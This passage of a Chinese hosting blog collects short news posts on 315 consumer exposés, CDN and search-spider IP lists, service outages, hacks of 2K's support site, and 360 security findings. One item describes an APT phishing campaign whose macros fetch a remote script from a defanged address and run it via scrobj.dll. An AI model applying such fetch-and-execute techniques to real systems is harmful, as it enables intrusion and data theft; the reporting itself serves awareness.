国内最大家电维修平台 “啄木鸟家庭维修” 被曝强制师傅高价推销: 套路百出:修洗衣机仅开龙头收费 100 元,换燃气灶电池帽谎称 “点火器故障” 收费 250 元; 成本暴利:更换塑料电机成本 91 元,收费 659 元,旧件转卖 60 元; 平台施压:师傅因报价低遭批评,公司抽成 60%,倒逼 “过度维修”。数据:投诉平台累计超 6000 条,300 城 10 万师傅被裹挟。 4. 保水虾仁:磷酸盐超标、包冰增重,1 斤仅 3 两虾肉 多家水产企业为增重,违规超量添加保水剂(复合磷酸盐): 超标 2 倍:国家标准≤1.5g/kg,部分企业达 30g/kg,浸泡超 12 小时,保水率 20%; 二次增重:冻虾仁包冰率最高 70%,解冻后仅 3 两虾肉; 标签造假:外包装仅标 “虾仁 + 水”,隐瞒添加剂。健康风险:长期过量摄入致钙磷失衡、心血管疾病。 5. 电子签高利贷:“死人账号” 放贷,砍头息 + 暴力催收 借贷宝、人人信等平台纵容 “电子签” 高利贷: 砍头息:借款 5000 元实收 3500 元,7 天利息 1500 元; 身份造假:放款人用虚假账号,甚至盗用逝者信息,人脸识别成摆设; 逃避追责:平台提供的放款人资料无法查证,受害者起诉无门。模式漏洞:平台收手续费,放款人无风险套利,形成灰色产业链。 6. 信息黑洞:大数据公司窃取隐私,日处理 100 亿条数据 云企智能、企腾网络等公司通过 “精准获客” 软件疯狂窃取个人信息: 爬虫监控:扫描短视频评论区,抓取手机号、微信;监控竞品直播间 “截流”; 三网数据:勾结运营商,获取用户通话、上网记录,打 3800 项标签,日处理 100 亿条; 滥用场景:医美、教育等行业购买数据,甚至偷取公众号读者、群成员信息。案例:某公司宣称 “20 亿条精准画像”,客户包括土巴兔、拜博口腔等。 总结 今年 315 聚焦 “卫生安全”(母婴 / 贴身用品)、“消费欺诈”(维修 / 食品)、“金融陷阱”(高利贷)、“数据滥用” 四大方向,曝光企业从生产端到销售端的全链条违规,凸显监管盲区与行业逐利下的消费者权益危机。晚会后,多地已启动联合执法(如梁山希希公司被公安介入调查)。 #### 2025最新京东云星盾 SCDN 回源IP段 14.204.96.224/27 27.36.126.224/27 27.128.218.224/27 36.131.191.32/27 36.136.95.32/27 36.147.52.160/27 36.154.11.224/27 42.236.121.160/27 58.243.179.96/27 60.13.99.64/26 61.159.93.32/27 61.159.93.160/27 101.69.205.224/27 103.44.252.32/27 110.40.28.96/27 111.48.87.160/27 111.170.27.96/27 112.49.47.96/27 113.56.217.96/27 113.240.104.192/26 114.67.161.32/27 114.67.192.208/28 116.163.41.64/26 116.177.241.224/27 116.198.49.144/28 116.198.165.16/28 117.149.249.160/27 117.187.185.32/27 119.0.67.32/27 119.188.204.32/27 120.206.188.224/27 120.220.55.96/27 120.226.37.160/27 120.241.124.96/27 121.17.125.32/27 122.226.163.224/27 123.138.203.160/27 124.166.232.32/27 124.225.84.32/27 125.77.31.224/27 150.138.153.192/26 182.201.240.224/27 182.242.62.160/27 183.131.87.224/27 183.204.41.64/26 198.41.130.16/28 218.207.1.32/27 220.185.189.128/25 222.216.121.160/27 2400:cb00:164:0:1000::/68 2403:1ec0:1200:ff98::/64 2403:1ec0:1400:ff01::/64 2403:1ec0:1400:ff05::/64 2403:1ec0:1610:ff05::/64 2407:3740:0:6:1000::/68 2408:8719:64:50:1000::/68 2408:871a:8810:205:1000::/68 2408:8720:806:102:1000::/68 2408:8726:3000:fff4:1000::/68 2408:8740:71fc:406:1000::/68 2408:8744:1000:9:1000::/68 2408:874f:b000:4:1000::/68 2408:8752:600:6:1000::/68 2408:8756:4cff:d002:1000::/68 2408:8760:107:2:1000::/68 2408:876c:2c0:112:1000::/68 2408:8773:fff:ffe1:1000::/68 2408:8776:1:72:1000::/68 2409:8720:4001:2:1000::/68 2409:8760:1e81:52:1000::/68 2409:8c14:f22:1912:1000::/68 2409:8c34:d00:6:1000::/68 2409:8c38:c50:604:1000::/68 2409:8c3c:1400:5:1000::/68 2409:8c4d:5200:c05:1000::/68 2409:8c50:a00:2213:1000::/68 2409:8c54:4010:27:1000::/68 2409:8c5c:b00:206:1000::/68 2409:8c6a:3a11:2:1000::/68 2409:8c6c:561:8124:1000::/68 240e:b1:9801:20d:1000::/68 240e:c2:1800:14e:1000::/68 240e:f7:4d0f:601:1000::/68 240e:f7:7c00:821:1000::/68 240e:90d:1101:203:1000::/68 240e:914:4005:1:1000::/68 240e:935:a00:1706:1000::/68 240e:935:a00:1707:1000::/68 240e:938:a05:22:1000::/68 240e:944:8:5:1000::/68 240e:94c:4000:1602:1000::/68 240e:950:1:2011:1000::/68 240e:95d:c02:7:1000::/68 240e:965:820:105:1000::/68 240e:97c:4014:102:1000::/68 #### 260万粉丝公众号“青年大院”被封号 近日,自媒体圈内知名公众号“青年大院”被微信封杀,所有公众号推文被屏蔽,账号被停用!   据了解,“青年大院”创作者团队原来都是师从咪蒙,走的也是以制造争议吸引人气的写作风格,与咪蒙之前的文风很相似,巅峰时期“青年大院”坐拥260万公众号粉丝,每篇公众号头条文章阅读数接近10万,可以说在公众号圈内是妥妥的大号了! 至于“青年大院”封号原因,有业内人士透露,官方封号原因显示,“青年大院”被封原因是违反了《互联网用户公众账号信息服务管理规定》,但个人猜测,应该是“青年大院”最近那篇文章过于敏感,又或者长期煽动情绪带节奏触碰红线等原因被人投诉封号,“青年大院”这种消极对冲的写作风格被封杀是早晚的事,他们的前老板咪蒙就是一个典型的例子! 另外针对“青年大院”被微信封杀也有站长表示:对于自媒体人和站长来讲,获取流量可以用各种手法,但是遵循平台和道德底线是基础,在写作方面不论是自己网站还是新媒体账户,那些东西可以写,那些东西不能写要心里有点数,千万不能触碰红线来获取流量,不然封号就是分分钟的事! 相对于第三方自媒体来说,自己建的网站其实内容其实宽松些,但是其获取流量就相对难些,运营起来也麻烦些,不过主机吧认为寄人篱下始终不是好办法,自己建立网站APP才是王道。 #### 263企业邮箱因光缆中断导致部分用户无法使用 5月18日 消息:今天上午有大量网友反馈称263企业邮箱崩了,无法正常登录,页面显示:连接错误。 由于连接方在一段时间后没有正确答复或连接的主机没有反映,连接尝试失败。网友调侃“还好昨晚客户收到邮件了”“感觉错失1个亿”。 对此,263企业邮箱客服发布紧急通知,表示受光缆中断影响,部分用户无法使用邮箱服务,故障方正在加急抢修。 公开资料显示,263企业邮箱为263网络通信自主开发,263网络通信是国内较早开始推广专业企业邮箱服务的电信级电子邮箱服务商之一,支持超过4000万用户的邮件系统平台。 #### 2K服务网站遭到黑客攻击  9 月 21 日消息,上周末 Rockstar Games 在开发中的《GTA 6》测试版游戏视频被黑客泄露到网上,引起轰动。而在今日,与 R 星同属母公司 Take Two 的 2K 也发声明称遭黑客袭击。 2K 称,其官方支持网站(support.2k.com)遭到了黑客攻击,并警告用户要小心钓鱼邮件,同时他们已经把支持网站关闭以进行维护。 2K 在一条推文中称:“今天早些时候,我们意识到一个未经授权的第三方非法访问了我们的一个供应商在帮助台平台上的凭证,2K 用这个平台为我们的客户提供支持。未经授权的一方向某些玩家发送了含有恶意链接的信息。请不要打开任何电子邮件或点击你从 2K 游戏支持账户收到的任何链接。” 据报道,恶意链接被伪装成 2K 启动器的下载链接,但实际上会导致受害者下载旨在窃取保存在浏览器中的密码的恶意软件。如果已经点击该链接,2K 建议重置存储在浏览器中的密码,2K 还建议在有条件的地方启用多因素认证,运行防病毒扫描,并检查电子邮件设置是否有意外的新转发规则。 这次攻击似乎与泄露《GTA 6》视频的黑客攻击无关,2K 游戏和 Rockstar 虽有同一个母公司 Take-Two,但被攻击的系统并不相关,而且它们是不同类型的攻击,目标也不同。Rockstar 的黑客攻击目标是开发商及其游戏信息,而对 2K 支持的攻击是利用公司来接触其客户。 #### 2亿次CC攻击怎么防? 虽然百度云加速经过一轮的涨价后,性价比没有以前高了,不过防御CC攻击依然很强。 就在昨晚,一客户联系主机吧反馈网站打开突然慢了,怀疑是被CC攻击了。 主机吧查看了下,确实是被CC攻击了,而且不小,马上进入 安全功能-ADS开启强力防护模式。 5分钟左右就恢复了,然后我们就查看攻击多大呢? CC攻击峰值足足有1.4亿次 CC攻击造成CDN的流量峰值高达15.56GB(这是非常大的,也就百度云加速能抗得住,一般的小服务器估计要崩溃了) 攻击区域大多来自国外,所以建议大家如果被攻击的时候最好屏蔽掉国外访问,可以大大减少攻击量 这个客户目前用的是百度云加速商务版,主机吧代理价月付778 季付2100,有需要的同学可以联系。 #### 315瑟瑟发抖的百度竞价推广 每年的315都放出几个重磅新闻,今年也不一例外,其中互联网人最为关注的一条应该是:360搜索和UC浏览器涉医药广告造假 。 央视记者在UC浏览器上搜索“减肥”“降血糖”等关键词,搜索结果的前几条都是网友分享治好疾病经历,下方标注着广告字样。 广告里网友自称,自从认识某老师,按照老师给的方子,血糖恢复稳定,胰岛素都停用了。文章中多次醒目标红老师的微信号。 记者微信添加了这位老师,对方简单询问过病情后,就向记者推荐“白背三七诺丽果粉”。记者发现,这只是一款普通食品。不仅是UC浏览器,在360搜索也有不少类似的广告。近年来,315晚会针对互联网中的虚假广告问题进行过多次报道,2020年3月国家市场监督管理总局等十一部门联合印发通知,强调严厉打击保健食品、医疗、药品等事关人民群众健康和财产安全的虚假违法广告。这些广告又是如何改头换面,登上浏览器呢?在360上海广告总代理经格网络科技有限公司,销售经理称:“在网站里面不能有任何品牌。把微信推给人去聊聊,聊完之后卖产品。”对于这样的广告违规不少代理公司心知肚明。就算对方没有资质,广告也能投放出去。记者只提供了一个微信号和产品类型,代理公司很快就制作出一篇内容为减肥、降血糖的自述广告和一篇有问必答、快速问医师的专家答疑广告。专家子虚乌有,疗效神乎其神,评论也是事先写好的,就连点赞数量也可以根据需要任意设定。交了钱就能上,记者在UC浏览器和360搜索上进行搜索,果然找到了代理公司制作的这两则虚假广告。 作为互联网人,这种套餐很常见,百度以前也有,不过因为前几年的事情,百度已经改了很多,没想到现在轮到360搜索和UC了。以往都是我们吐嘈百度广告多,不过一次主机吧360搜索看了下,那广告对比百度只多不少,整整8条广告,一个首页搜索结果也就十七八条,结果一半左右都是广告,想想真的比百度还夸张。 主机吧记得以前360刚出来的时候是没有什么广告的,整个搜索给人一种整洁的感觉,虽然搜索结果精准度不高,但也不至于像现在这么惨,估计是360认为搜过引擎已经没啥希望了,干脆能挣点是点了。 以前百度因为医疗方面的搜索结果被骂惨了,不过现在好很多,都是直接和医院合作了,存在虚假医疗信息的很少了。   #### 315被点名的腾牛网百度权重恢复了 还记得今年央视“3·15晚会”曝光“腾牛网”下载器捆绑软件下载问题吗?后“腾牛网”网站关闭整改,“腾牛网”主体单位主要负责人已被行政约谈,并被责令立即停止违规业务。 连百度也把腾牛网给降权了,不过经过两个月的整改后,腾牛网百度权重居然恢复曝光前的了。 我们可以看到从5月9号开始,腾牛网的权重就一直飙升,看来大站没这么容易掉排名啊,哪怕被特别降权,经过几个月努力后还是会恢复的,这也是为什么很多站长都是收购那些做了几年的老网站来做网站的原因了。 #### 360 AI 搜索 App 上线 360 AI搜索App已经正式上线,当前版本为1.0.0,安装包大小为27.4M。这款应用的核心功能是基于“爬虫”抓取和用户提交的数据,生成逻辑清晰、有理有据、追根溯源的答案。 当用户在360 AI搜索中输入任何问题时,都会触发一系列复杂的处理流程来生成答案。首先,360大模型会进行问题分析,如果发现问题存在歧义或缺少关键信息,它会主动向用户请求澄清或补充缺失的信息。大模型将复杂的搜索问题分解为多个覆盖不同方向的关键词。然后,这些关键词通过360搜索在数百万个网页中进行检索,并根据用户的问题进行重新匹配排序。接下来,大模型会从与用户问题匹配的几十个网页中提取内容。最后,360AI搜索会根据用户的问题,生成逻辑清晰,有理有据、追根溯源的答案136。 此外,360 AI搜索还有一个名为“增强模式”的功能,在用户提问后,AI将进行语义分析并追问以补充更多信息。然后,AI将问题拆分为多组关键词进行搜索引擎检索,深度阅读更多的网页内容,生成逻辑清晰、准确无误的答案。 值得注意的是,“360搜索”基于“爬虫(Spider)”抓取数据以及用户主动提交的数据而运作,即“360搜索”的爬虫将从某些网页出发,通过网页间的相互链接关系,并结合用户主动提交的数据,对互联网上的超链接进行访问和下载。 #### 360 将关闭“网购先赔”服务,用户遭受经济损失后不再补偿 7 月 8 日消息,360 安全卫士运营团队今日发布公告,由于产品的升级和调整,将于 7 月 12 日下线 360 安全卫士 beta 版本的 “网购先赔”入口,然后逐步下线 360 安全卫士正式版、360 安全卫士极速版、360 企业安全云、360 杀毒以及 360 浏览器各版本中的“网购先赔”入口,并于 10 月 1 日起停止“网购先赔”的理赔服务。 “网购先赔”是 360 安全卫士推出的一款安全保障服务。为保障互联网网络交易安全,针对使用 360 安全卫士网购保镖的用户,在遭到钓鱼网站或网购木马病毒的欺诈而遭受相关网上银行财产损失时,360 网购先赔对用户所遭受的直接经济损失予以有限补偿。本次仅下线“网购先赔”服务,保留网购保镖安全检测的功能。 360 安全卫士运营团队表示,在正式停止理赔服务之前,会完成对已经提交的理赔申请的审核。 #### 360上线字体版权在线查询功能 前几天疯传网络的“微软雅黑字体商用侵权,公司被索赔千万”的消息,舆论话题爆发热议不久,360即刻推出了360查字体的工具功能,可以一键检测电脑安装字体是否免费或是“商用需授权”的,给字体版权出一条判别路径,不得不错360反应真快! 如图,打开360查字体: 可以检测“你已安装”电脑上已有的字体,看到哪些是蓝色的“免费可商用”,哪些是标注红色的“商用需授权”字体,还能搜索指定字体,查看字体版权范围,但目前貌似功能不是特别的完善。 不过,此事从一开始也引发了广泛重视,包括“方正字体”事件疑似微软方面都介入沟通协商了,版权意识如此强烈,那是因为背后吃字体版权亏的不在少数啊!一字贵的能赔几万! 国内目前版权赔偿法律并不完善,导致很多版权方完全是漫天要价,很多公司都吃过亏,所以希望版权法律尽快完善吧! #### 360分析:51la、百度统计以外网站的第三选择 之前有站长咨询主机帮除了51啦、百度统计外,还有哪些免费的网站统计工具? 今天主机帮可以回答:有,360分析工具。 这是一个来自于360公司旗下的网站分析服务,拥有非常完善的功能,可以查流量来源、搜索词分析等,还支持实时数据等功能。 使用360分析好处是大公司,安全,不会藏暗链。而51啦小公司,懂的都懂,百度呢,又经常故障。 需要用的同学可以试试,地址:https://fenxi.360.cn #### 360发现全球首例使用浏览器0day漏洞的Office攻击 4 月 20 日消息,近日, 360 安全中心在全球范围内监测到一例使用0day漏洞的APT攻击,经分析发现,该攻击是全球首个使用浏览器0day漏洞的新型Office文档攻击。只要打开恶意文档就可能中招,被黑客植入后门木马甚至完全控制电脑。 通过分析溯源, 360 已完整捕获黑客攻击过程,向微软报告浏览器0day漏洞细节,并将该漏洞命名为“双杀”漏洞。“双杀”漏洞可影响最新版本的IE浏览器及使用IE内核的应用程序。目前, 360 正紧急推进该漏洞的补丁发布。在此期间提醒相关用户,请勿随意打开陌生的Office文档,同时使用安全软件防护可能出现的攻击。 黑客是通过投递内嵌恶意网页的Office文档的形式实施此次APT攻击,中招者打开文档后,所有的漏洞利用代码和恶意荷载都通过远程的服务器加载。攻击的后期利用阶段使用了公开的UAC绕过技术,并利用了文件隐写技术和内存反射加载的方式来避免流量监测和实现无文件落地加载。 360 安全中心提醒相关用户,请勿随意打开未知来路的office文档。同时,提醒各相关企、事业单位,警惕利用“双杀”漏洞发动的定向攻击,密切跟踪该漏洞的最新情况,及时评估漏洞对本单位系统的影响,同时使用安全软件防御可能的漏洞攻击。 360 安全中心将对该漏洞持续跟进关注,并推进相关安全补丁的发布。(静静) #### 360发现区块链平台EOS高危漏洞,可完全控制虚拟货币交易 5 月 29 日消息    此前,有不少数字货币智能合约被爆出现漏洞,日前EOS平台也被发现存在高危漏洞。 360 安全卫士官方公众号今天发文宣布,其安全团队发现区块链平台EOS的一系列高危安全漏洞,其中部分漏洞可以通过远程攻击,直接控制和接管EOS上运行的所有节点。目前, 360 已经将漏洞上报给EOS官方,EOS方面表示在修复这些问题之前,不会将EOS网络正式上线。 据 360 官方介绍,在攻击中,攻击者会构造并发布包含恶意代码的智能合约,EOS超级节点将会执行这个恶意合约,并触发其中的安全漏洞。攻击者再利用超级节点将恶意合约打包进新的区块,进而导致网络中所有全节点(备选超级节点、交易所充值提现节点、数字货币钱包服务器节点等)被远程控制。 由于已经完全控制了节点的系统,攻击者可以“为所欲为”,如窃取EOS超级节点的密钥,控制EOS网络的虚拟货币交易;获取EOS网络参与节点系统中的其他金融和隐私数据,例如交易所中的数字货币、保存在钱包中的用户密钥、关键的用户资料和隐私数据等等。 更为严重的是,攻击者可以将EOS网络中的节点变为僵尸网络中的一员,发动网络攻击或变成免费“矿工”,挖取其他数字货币。 360安全团队表示,此次在EOS平台的智能合约虚拟机中发现的一系列新型安全漏洞,是一系列前所未有的安全风险,此前尚未有安全研究人员发现这类问题。这类型的安全问题不仅仅影响EOS,也可能影响其他类型的区块链平台与虚拟货币应用。 #### 360安全卫士:捕获用肺炎疫情投递攻击案例 来自印度黑客组织 2 月 5 日消息,据“ 360 安全卫士”微信号发布的消息,近日, 360 安全大脑捕获了一例利用新冠肺炎疫情相关题材投递的攻击案例,攻击者利用肺炎疫情相关题材作为诱饵文档,对抗击疫情的医疗工作领域发动APT攻击。 据介绍,该攻击组织使用采用鱼叉式钓鱼攻击方式,通过邮件进行投递。公然利用当前肺炎疫情等相关题材作为诱饵文档,部分相关诱饵文档如:武汉旅行信息收集申请表.xlsm,进而通过相关提示诱导受害者执行宏命令。 简单说,攻击者其将关键数据存在worksheet里,worksheet被加密,宏代码里面使用key去解密然后取数据。然而其用于解密数据的Key为:nhc_gover,而nhc正是中华人民共和国国家卫生健康委员会的英文缩写。 这里一旦宏命令被执行,攻击者就能访问hxxp://45.xxx.xxx.xx/window.sct,并使用scrobj.dll远程执行Sct文件,这是一种利用INF Script下载执行脚本的技术。 据悉,该印度APT组织的攻击目标主要为:中国、巴基斯坦等亚洲地区国家进行网络间谍活动,其中以窃取敏感信息为主。而且在对中国地区的攻击中,主要针对政府机构、科研教育领域进行攻击,尤其以科研教育领域为主。 为什么印度APT组织却如此丧尽天良的对我国医疗机构发动定向攻击? 360 方面猜测称:第一, 它们为了获取最新最前沿的医疗新技术。这与该印度APT组织的攻击重点一直在科研教育领域有着莫大关系;第二, 它们为了进一步截取医疗设备数据。为打赢这场异常艰难的疫情之战,我国投入了重大的人力、物力、财力资源,其中尤其在医疗设备上更是重点,所以该组织此次发动攻击,能进一步截取我国更多的医疗设备数据信息; 第三, 扰乱中国的稳定,制造更多的恐怖。疫情面前,不仅是一场与生物病毒的战役,更是一场民心之战,只有民心定了,才能保证社会的稳定。而该组织在此次发动攻击,无疑给疫情制造了更多的恐慌,恐吓之中,进行扰乱社会的稳定。 #### 360安全团队发现MacOS蓝牙漏洞 苹果奖励7.5万美元 3月26日 消息:近日,苹果公司连发两份安全通告,致谢360 Alpha Lab团队发现 5 个MacOS蓝牙漏洞,并奖励漏洞奖金7. 5 万美元。 据了解,这是苹果MacOS系统中罕见的漏洞组合,该漏洞存在于苹果MacOS蓝牙进程中,而各种蓝牙设备之间又是互相连接。这意味着,该漏洞可获取苹果MacOS系统最高ROOT进程权限,并达到完全控制电脑的程度。 360 Alpha Lab团队将其命名为“Bluewave”漏洞,该漏洞组合全部属于“零点击无接触”远程利用漏洞,摧毁力强且影响范围广,覆盖macOS Mojave 10.14.6, macOS High Sierra 10.13.6, macOS Catalina 10.15. 2 版本在内的所有苹果笔记本。 目前,苹果官方已根据 360 安全团队所提交的漏洞报告发布补丁。 #### 360广告联盟图加广告位上线 做网站的总免不了做广告联盟,近日360 PC SSP全新上线了“图加”广告位样式,其优化了广告位的展示效果,且成为帮助站长增收的重要形式之一。 图加广告是什么呢? 其实就是广告位提供以图片为载体,与图片本身的内容软性结合的变现方式,例如和百度的图加效果差不多。这种广告形式是非常适合图片站的。 图加广告位的好处在于目前在图片上展示广告位、样式更新颖炫酷,不仅优化了用户的浏览体验,保障页面的视觉效果,还把推广信息与用户的兴趣及图片内容相结合,体验与变现双赢。 此外,媒体用户获取广告位代码流程也超级简单:只需登录360pc媒体方平台,选择媒体、新增广告位,填写位置名称,选择“PC图加广告位”,获取广告位代码即可。 不过目前图加只在pc网页上有适配样式,支持所有网页中含有图片的360联盟合作媒体。 需要注意的是,出于用户体验及转化效果,pc端要求图片的尺寸大于300*255px,能自动识别大图,无需设置形态尺寸、效果配置。 部分网友表示图加广告可能会对一般站点有点鸡肋,影响用户体验;不过总的来说对有需求的站长网站还是很有帮助的。附:360pc媒体方平台点此登录入口 #### 360搜索宣布下线“明星人气榜” 8月12日 消息:今日,360搜索官方微博宣布即日起将下线“明星人气榜”。 此前,微博表示为倡导粉丝理智追星,履行企业主体责任,微博决定下线“明星势力榜”。 官方表示,“明星人气榜”的设立初衷是建立粉丝交流的园地,让粉丝能够获取到更多“爱豆”相关内容与信息。然而,近期媒体报道社会上各类非理性追星行为,应援打榜、投票打榜逐渐滋生不良风气,容易给未成年人带来负面影响。因此,为了及时遏制非理性应援行为,守护青少年健康成长,360搜索决定从即日起关闭相关功能入口,下线明星人气榜单。 未来,360搜索将继续致力于构建清朗的数字空间,助力青少年健康成长。 值得一提的是,自6 月以来“清朗·饭圈乱象整治”行动后,各大互联网平台纷纷发布整治饭圈乱象公告,重点打击诱导未成年人无底线追星、极端言论等行为。 #### 360搜索引擎所引蜘蛛IP     360搜索的蜘蛛在访问网站时,都会带上带有360Spider签名信息的UA,其形态为: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider 为满足站长朋友们的需求,我们现将最新360搜索的蜘蛛IP段公布出来,供大家参考。请大家注意,不要误拦截360搜索蜘蛛,以避免出现收录或网站抓取异常。 此外,需要说明的是,目前360搜索蜘蛛暂时不支持nslookup命令的查询,因此建议大家以本页面查询到的IP为准,结合本页提供的信息进行比对,以确认是否为360搜索的蜘蛛。 以下为360搜索的蜘蛛IP段: 180.153.232.* 180.153.234.* 180.153.236.* 180.163.220.* 42.236.101.* 42.236.102.* 42.236.103.* 42.236.10.* 42.236.12.* 42.236.13.* 42.236.14.* 42.236.15.* 42.236.16.* 42.236.17.* 42.236.46.* 42.236.48.* 42.236.49.* 42.236.50.* 42.236.51.* 42.236.52.* 42.236.53.* 42.236.54.* 42.236.55.* 42.236.99.* 您可以通过下载我们360搜索详细的蜘蛛IP列表,在本地进行查阅参考。 #### 360搜索引擎站长平台出一键切HTTPS协议 HTTPS现在越来越普及了,国内网站已经超过8成网站用HTTPS了,小程序甚至要求必须HTTPS。百度很早就知道一键切换HTTPS了,效果也非常明显,几乎是切换的第二天就生效了。 而作为国内第二第三搜索引擎的360、搜狗迟迟不出切换HTTPS,导致一些比较看重这两个搜索引擎的网站一直不敢部署HTTPS,怕影响严重。 不过最近好消息就是360站长平台已经支持一键切HTTPS了 相信未来搜狗站长平台也会支持的吧,毕竟HTTPS已经是网站必备了。 #### 360搜索移动端开放子链申请啦 子链申请流程        360鼓励站长提交优质子链,在搜索结果中以更丰富的形式展现,提升网站的流量和用户体验,目前站点子链仅在移动端展现,触发方式:采用关键词(主链名称)精确匹配方式触发子链展现。(例如申请的关键词为“360搜索”,在搜索“360官网”时则不能触发子链展现。) 线上展现样式 站点申请须知 1、接受个人、企业、事业单位、社会团体、党政机构、政府类网站的认证申请; 2、网站需符合国家法律法规规范,无政治敏感、色情、欺诈、违禁等内容及虚假广告链接; 3、网站为优质站点,具有一定知名度或权威性,无重大安全隐患、无用户隐私泄漏、挂马、钓鱼欺诈等不良记录; 4、网站需有备ICP备案; 5、通过官网认证站点有权限提交子链; 申请流程 站点验证→填写子链→子链审核→线上展现 点击此处,进入站长平台,申请站点子链 数据填写说明 1、主链请填写站点首页、子链请填写站点相关质量较高链接,不得填写推广、低质、无用户需求链接 2、360支持2条至6条子链接的展现样式,对已提交的子链您可以进行标题、摘要的修改操作; 3、若主链为主站,推荐添加重要的子站点作为子链数据;若主链为子站点,推荐添加重要频道页作为子链数据; 4、您可以根据重要程度对子链进行排序,360会参考设定的排序综合评估确定最终的展现顺序; 填写示例: 字段 填写示例 填写说明 主链地址 https://www.so.com 内容必须是URL 主链移动地址 https://m.so.com 内容必须是URL 主链名称 360搜索 1、主链的名称必须唯一;2、不能超过12个字;3、不能含有特殊字符 主链标题 360搜索,SO靠谱,是安全、精准可靠的搜索引擎 最多20个字 主链简介 360搜索是安全、精准、可信赖的新一代搜索引擎, 360搜索,so靠谱 最多80个字 子链PC地址 http://image.so.com 内容必须是URL 子链移动地址 http://image.so.com 内容必须是URL 子链标题 360图片 1、限2-6个字2、不能含有特殊字符 审核标准 1、主链名称需与ICP备案信息、网站名称、网站logo等相符; 2、主链名称具有唯一性,即无歧义,不与其他网站名或常用名冲突;正例:淘宝网,反例:河北人才网、服装网、人民医院、雅普科技; 3、子链需与主链存在从属或相关关系,不得填写无关或广告推广链接; 4、子链请提交具有用户需求且内容质量较高的链接,在搜索结果页也会有更好的点击; 5、主链和子链均不能为死链或不稳定链接 注意事项 1、提交主链和子链后,360承诺7个工作日内审核完成。已通过审核的站点,生效周期一般为2个工作日; 2、提交后未通过审核可根据提示信息进行修改重新提交审核; 3、对于通过审核且生效的数据,360会根据用户搜索需求对子链展示进行调整,所以最终效果以实际展示为准; 4、建议定期在站长平台更新和维护提交的主链和子链信息,如信息过期或存在死链,数据将被360酌情下线; 5、如有其他问题请联系360站长平台:service-so@ex.360.cn #### 360搜索站长平台因郑州机房故障无法访问 刚刚还发文说,郑州暴雨导致郑州数据中心全面停运了的消息。这不,受影响的360搜索站长平台直接就不能访问了。 主机吧查了下,360站长平台的节点确实是郑州的。 具体是哪个机房不得而知,郑州作为国内互联网重要枢纽,这次暴雨,影响肯定不只一点,主机吧看了下,百度云加速的郑州节点也故障下线了。   #### 360搜索网站:该页面因服务器不稳定可能无法正常访问 如果搜360搜索SEO的站长估计会遇到网站被360搜收录后,偶尔会出现提示:该页面因服务器不稳定可能无法正常访问,这里主机吧转载了官方的处理方案给大家,希望可以解决。 近期我们接到一些用户反馈:网站出现“该页面因服务器不稳定可能无法正常访问”的提示。 这是由于网站访问不稳定造成。搜索引擎在抓取网站时,如发现网站经常无法访问,就会在搜索结果中出现此类提示。请各位站长遵循我们近期发布的《360网页质量白皮书》,对网站访问的可用性,稳定性进行良好的优化和提升! 发现被标记的排查方法,以及标记去除的方法: 核实网站是否拦截了360搜索蜘蛛,并导致蜘蛛下载站点失败,建议在服务器中设置访问白名单,将我们的蜘蛛ip加到网站访问允许的白名单中,我们的蜘蛛ip为:http://www.so.com/help/spider_ip.html 如果是https站点,请您先核实站点设置ssl证书是否正确,如存在异常,建议在服务器或联系空间服务商进行调整 网站是否曾有临时关站、访问不稳定、服务器并发次数配额过少的情况,如有,请您对服务器、域名解析等影响访问的关键环节进行检查,确保网站访问可用性 后续请务必注意在访问稳定性上进行提升优化,不要频繁进行变更交割操作,但是如果网站本身已经关闭:请合理设置网站为协议死链。 请务必辛苦检查上述几点是否无问题,否则标记可能无法去除,并且可能导致网站收录等其他问题。 确认无问题之后,您可以通过站长平台,提交不稳定标记申诉反馈,提交的流程如下:   1.通过http://zhanzhang.so.com/,访问360站长平台,并登录帐号        2.点击右下角“反馈中心”的浮层按钮    3.在页面:http://zhanzhang.so.com/exception_report/instable中填写相关的网址信息     #### 360搜索自动推送JS疑似取消了 JS推送代码可以让网页每次有人访问的时候,就会自动把网页推送到搜索引擎,实陆自动提交蜘蛛收录的目的。 不过,不知道什么原因,百度去年就取消了这个功能,今年似乎360也跟进了。 目前360站长平台已经找不到这个功能了。 360自动收录工具地址:http://zhanzhang.so.com/sitetool/auto_include 目前打开已经404 360搜索站点子链功能也被关了。http://zhanzhang.so.com/sitetool/site_sublink 其实不只360搜索,连神马的API推送也无法使用了。 以后要给搜索引擎推送内容,估计只能手动提交URL了,或者等搜索引擎蜘蛛自己来了。这样的话,蜘蛛池的作用就起来了。 #### 360搜索自动收录JS升级切换HTTPS 解决劫持问题 最近360搜索引擎的自动收录JS已经换成了HTTPS啦,这对于站长管理员来说这无疑是一个好消息,为什么呢? 因为之前360的JS代码是存在被劫持的怀况的,17年的时候主机吧就遇到过一个客户网站也没有被挂马却经常弹出广告,一开始以为是电脑浏览器问题,结果换了几个浏览器后还是存在这问题,查看了下客户网站用了百度统计和360搜索引擎自动提交代码,结果分别测试两个代码后,发现撤掉360自助收录后,网站居然正常了,由此见360自动收录JS是被劫持了,这个其它不少见,比如百度统计以前也是被劫持的,后来换成了HTTPS后这种情况就没有了,HTTPS确实能彻底解决网站被劫持问题,各位站长管理员还是尽快部署HTTPS吧。 以下是360搜索官方的说明: 亲爱的站长朋友们: 站长平台自动收录的JS切换为https,不再支持http的JS,请各位站长朋友尽快进行替换。另外建议广大站长朋友,为了您的网站更安全,如果您的网站是http,建议升级为https。 由于http容易被劫持,可能造成网站流量丢失、用户信息被盗取、插入广告、挖矿等,给网站带来损失。所以平台自动收录JS切换为https,建议网站已经使用原自动收录代码的,立即更新为最新代码,旧有自动收录代码9月7日以后不再支持。也建议站点升级为https。 互联网网站的安全,离不开我们与站长的共同努力,大家一起构建安全的网络环境。辛苦站长朋友们尽快检查并将JS升级为https。 自动收录工具地址:http://zhanzhang.so.com/sitetool/auto_include #### 360搜索被罚后 UC浏览器也被罚209万元 4月13日 消息:在今年的315晚会上,UC、360搜索存在虚假广告一事被曝光。报道称,用户只需提供一个微信号和产品类型,代理公司很快就制作出一篇内容为减肥、降血糖的自述广告,就算没有资质,广告也能投放出去。 今日早些时候,北京市市场监管局对360搜索发布虚假违法广告一事作出罚款200万元的行政处罚决定。 360方面回应称,诚恳接受,坚决服从,并积极配合相关部门进行整改,全力保障消费者的合法权益。自3月15日以来,我司全力配合调查,成立专项工作小组,对涉事代理商及相关账号进行彻查。同时,认真落实平台责任,完善广告审核机制,进一步加强对广告代理商的管理。 